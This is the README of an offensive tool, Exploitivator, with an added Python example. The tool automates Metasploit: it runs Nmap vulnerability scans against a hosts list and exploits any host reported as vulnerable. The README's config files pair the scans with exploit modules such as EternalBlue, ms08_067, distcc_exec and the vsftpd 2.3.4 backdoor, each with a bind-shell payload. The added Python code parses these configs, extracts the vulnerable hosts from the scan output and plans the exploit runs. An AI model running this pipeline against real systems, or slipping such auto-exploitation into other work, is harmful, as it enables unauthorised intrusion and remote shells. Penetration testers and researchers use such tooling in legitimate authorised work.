Exploitivator automates Metasploit scanning and exploitation. It has only been tested on Kali.
It depends on the msfrpc module for Python, described in detail here: https://www.trustwave.com/Resources/SpiderLabs-Blog/Scripting-Metasploit-using-MSGRPC/
Install the necessary Kali packages and the PostgreSQL gem for Ruby:
apt-get install postgresql libpq-dev git-core
gem install pg
Install the current version of the msfrpc Python module from git:
git clone git://github.com/SpiderLabs/msfrpc.git msfrpc
cd msfrpc/python-msfrpc
python setup.py install
Usage
Before running either of the scripts, start msfconsole and load the MSGRPC plugin from the console prompt: load msgrpc Pass=abc123
The Pass value is the password the scripts authenticate to the RPC service with. Anyone who can reach the RPC port with that password gets full control of the Metasploit instance, so replace the example value and only run the service on an isolated lab machine.
The results of scans and/or exploitation will appear in the Metasploit console and in the output file(s) (msf_scan_output.txt and exploitivator_output.txt).
Use MSFScan to run multiple Metasploit scans against a group of target hosts. Use Exploitivator to run Nmap script scans against a group of target hosts and automatically exploit any reported as vulnerable.
Exploitivator
Command line usage: ./exploitivator.py -l [attack machine IP] -f [hosts file] -u [MSF DB username] -m [MSF DB password]
Examples: The application can be run as follows, where ‘10.128.108.178’ is the IP address of the attack machine, ‘hosts.txt’ is a list of target hosts, ‘msf’ is the Metasploit Postgres username and ‘abc123’ is the Metasploit Postgres password: ./exploitivator.py -l 10.128.108.178 -f hosts.txt -u msf -m abc123
MSFScan
Command line usage:
./msf_scan.py filename
./msf_scan.py filename MSF_DB_Username MSF_DB_Password
Examples: The application can be run as follows, where ‘hosts.txt’ is a list of target hosts, ‘msf’ is the Metasploit Postgres username and ‘abc123’ is the Metasploit Postgres password: ./msf_scan.py hosts.txt msf abc123
To run with ‘hosts.txt’ as a list of target hosts, using the script’s default Metasploit Postgres username (msf) and the script’s default Metasploit Postgres password (abc123): ./msf_scan.py hosts.txt
Config Files
Both scripts rely on config files to provide details of the required Nmap and Metasploit scans and attacks.
MSFScan
The script uses a config file with the name ‘scan_types.cfg’. This contains a list of module paths, one per line, for the Metasploit scans that are to run against the targets. e.g.:
auxiliary/scanner/dcerpc/endpoint_mapper
auxiliary/scanner/smb/smb_version
auxiliary/scanner/x11/open_x11
auxiliary/scanner/discovery/ipv6_multicast_ping
auxiliary/scanner/discovery/ipv6_neighbor
auxiliary/scanner/smb/smb_login
Exploitivator
Exploitivator uses two config files (exploitivator_scan.cfg and exploitivator.cfg). One specifies Nmap scans and parameters (exploitivator_scan.cfg), and the other specifies Metasploit exploits and payloads (exploitivator.cfg). Both use ‘##’ as a field separator and have the following formats.
exploitivator_scan.cfg: [Label]##[Nmap command line parameters]##[Nmap command line parameters for file output]##[Optional – grep command to be used if Nmap’s greppable output is being used]
In the above format, the label ties each scan to the entry with the same label in exploitivator.cfg (the example files below use matching labels), the second field holds the scan options, the third the -oX or -oG output option, and the fourth, present only for greppable output, the grep command used to pick vulnerable hosts out of that output.
An example file content is shown below:
SMB_08-067##-p U:137,U:139,T:139,T:445 --script smb-vuln-ms08-067.nse##-oX ms_08_067.xml
SMB_09-050##-p U:137,U:139,T:139,T:445 --script smb-vuln-cve2009-3103.nse##-oX ms_09_050.xml
SMB_10-054##-p U:137,U:139,T:139,T:445 --script smb-vuln-ms10-054.nse##-oX ms_10_054.xml
SMB_10-061##-p U:137,U:139,T:139,T:445 --script smb-vuln-ms10-061.nse##-oX ms_10_061.xml
SMB_17-010##-p U:137,U:139,T:139,T:445 --script smb-vuln-ms17-010##-oX ms_17_010.xml
DistCC##-p 3632 -sSV##-oG distcc.gnmap##grep "3632/open/tcp//distccd"
JavaRMI##-p 1099 -sSV##-oG javarmi.gnmap##grep "1099/open/tcp//rmi"
VSFTPBackDoor##-p 21 -sSV##-oG vsftp_backdoor.gnmap##grep "vsftpd 2.3.4"
exploitivator.cfg: [Label]##[Metasploit exploit path]##[Optional – Metasploit payload details]
An example file content is shown below:
SMB_08-067##exploit/windows/smb/ms08_067_netapi##windows/meterpreter/bind_tcp
SMB_09-050##exploit/windows/smb/ms09_050_smb2_negotiate_func_index##windows/meterpreter/bind_tcp
SMB_10-061##exploit/windows/smb/ms10_061_spoolss##windows/meterpreter/bind_tcp
SMB_17-010##exploit/windows/smb/ms17_010_eternalblue##windows/meterpreter/bind_tcp
DistCC##exploit/unix/misc/distcc_exec##cmd/unix/bind_ruby
JavaRMI##exploit/multi/misc/java_rmi_server##php/meterpreter/bind_tcp
VSFTPBackDoor##exploit/unix/ftp/vsftpd_234_backdoor##none
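The following is an added example, not Exploitivator's own code, showing how the two '##' config formats fit together: it parses a scan file and an exploit file, builds the nmap argv for a target, picks vulnerable hosts out of either greppable output (via the configured grep pattern) or XML output, and joins the two files by label to decide which exploit module and payload would be run against which host. The sample configs, the gnmap lines and the XML fragment are constructed for the example; treating an NSE script that reports state VULNERABLE as "reported as vulnerable" is an assumption about how the page's wording maps to nmap output, not something the page states. The argv construction also refuses targets that begin with '-', since a hosts file line starting with an option would otherwise be handed to nmap as a flag.

```python
import re
import shlex
import xml.etree.ElementTree as ET
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Constructed sample configs in the two formats described above (not the project's files).
SCAN_CFG = """\
SMB_17-010##-p U:137,U:139,T:139,T:445 --script smb-vuln-ms17-010##-oX ms_17_010.xml
DistCC##-p 3632 -sSV##-oG distcc.gnmap##grep "3632/open/tcp//distccd"
"""
EXPLOIT_CFG = """\
SMB_17-010##exploit/windows/smb/ms17_010_eternalblue##windows/meterpreter/bind_tcp
DistCC##exploit/unix/misc/distcc_exec##cmd/unix/bind_ruby
VSFTPBackDoor##exploit/unix/ftp/vsftpd_234_backdoor##none
"""
# Constructed nmap output: one greppable run and one XML run against two hosts each.
SAMPLE_GNMAP = """\
# Nmap 7.91 scan initiated as: nmap -p 3632 -sSV -oG distcc.gnmap 10.0.0.0/29
Host: 10.0.0.5 ()\tPorts: 3632/open/tcp//distccd//distccd v1 ((GNU) 4.2.4)/
Host: 10.0.0.6 ()\tPorts: 3632/closed/tcp//distccd///
"""
SAMPLE_XML = """\
<nmaprun><host><address addr="10.0.0.7" addrtype="ipv4"/><ports><port protocol="tcp" portid="445">
<script id="smb-vuln-ms17-010" output="VULNERABLE: ... State: VULNERABLE"><table key="CVE-2017-0143">
<elem key="state">VULNERABLE</elem></table></script></port></ports></host>
<host><address addr="10.0.0.8" addrtype="ipv4"/><ports><port protocol="tcp" portid="445">
<script id="smb-vuln-ms17-010" output="Could not negotiate a connection"/></port></ports></host></nmaprun>
"""


@dataclass
class Scan:
    label: str
    nmap_args: str       # scan options, e.g. "-p 3632 -sSV"
    output_args: str     # file-output option, e.g. "-oG distcc.gnmap"
    grep: Optional[str]  # grep command, only when greppable output is used


def _fields(text: str):
    """Yield the '##'-separated fields of each non-empty config line."""
    for line in text.splitlines():
        line = line.strip()
        if line:
            yield line.split("##")


def parse_scan_cfg(text: str) -> Dict[str, Scan]:
    scans = {}
    for f in _fields(text):
        if len(f) not in (3, 4):
            raise ValueError("bad exploitivator_scan.cfg line: %r" % "##".join(f))
        scans[f[0]] = Scan(f[0], f[1], f[2], f[3] if len(f) == 4 else None)
    return scans


def parse_exploit_cfg(text: str) -> Dict[str, Tuple[str, Optional[str]]]:
    """Map label -> (exploit module path, payload or None when 'none' or absent)."""
    exploits = {}
    for f in _fields(text):
        if len(f) not in (2, 3):
            raise ValueError("bad exploitivator.cfg line: %r" % "##".join(f))
        payload = f[2] if len(f) == 3 and f[2] != "none" else None
        exploits[f[0]] = (f[1], payload)
    return exploits


def nmap_command(scan: Scan, target: str) -> List[str]:
    """Build nmap argv; a hosts-file entry must never be parsed as an nmap option."""
    if target.startswith("-"):
        raise ValueError("refusing option-like target %r" % target)
    return ["nmap", *shlex.split(scan.nmap_args), *shlex.split(scan.output_args), target]


def vulnerable_hosts(scan: Scan, nmap_output: str) -> List[str]:
    """Hosts the scan flagged, from greppable (-oG + grep pattern) or XML (-oX) output."""
    hosts = []
    if scan.grep is not None:
        pattern = shlex.split(scan.grep)[-1]  # last word of the grep command is the pattern
        for line in nmap_output.splitlines():
            m = re.match(r"Host:\s+(\S+)", line)
            if m and re.search(pattern, line):
                hosts.append(m.group(1))
        return hosts
    for host in ET.fromstring(nmap_output).iter("host"):
        addr = host.find("address").get("addr")
        for script in host.iter("script"):
            # Assumption: an NSE vuln script marks a confirmed finding with state VULNERABLE.
            states = [e.text for e in script.iter("elem") if e.get("key") == "state"]
            if "VULNERABLE" in states or "State: VULNERABLE" in script.get("output", ""):
                hosts.append(addr)
                break
    return hosts


def plan(scans, exploits, outputs) -> List[Tuple[str, str, Optional[str]]]:
    """(host, module, payload) triples to run; labels with no exploit entry are only reported."""
    runs = []
    for label, scan in scans.items():
        if label not in exploits or label not in outputs:
            continue
        module, payload = exploits[label]
        for host in vulnerable_hosts(scan, outputs[label]):
            runs.append((host, module, payload))
    return runs


if __name__ == "__main__":
    s, e = parse_scan_cfg(SCAN_CFG), parse_exploit_cfg(EXPLOIT_CFG)
    print(nmap_command(s["DistCC"], "10.0.0.5"))
    for run in plan(s, e, {"SMB_17-010": SAMPLE_XML, "DistCC": SAMPLE_GNMAP}):
        print(run)
```

A label present in exploitivator_scan.cfg but absent from exploitivator.cfg (SMB_10-054 in the page's examples, for which there is no exploit module) is scanned and reported but never exploited, which is the behaviour the label join above gives.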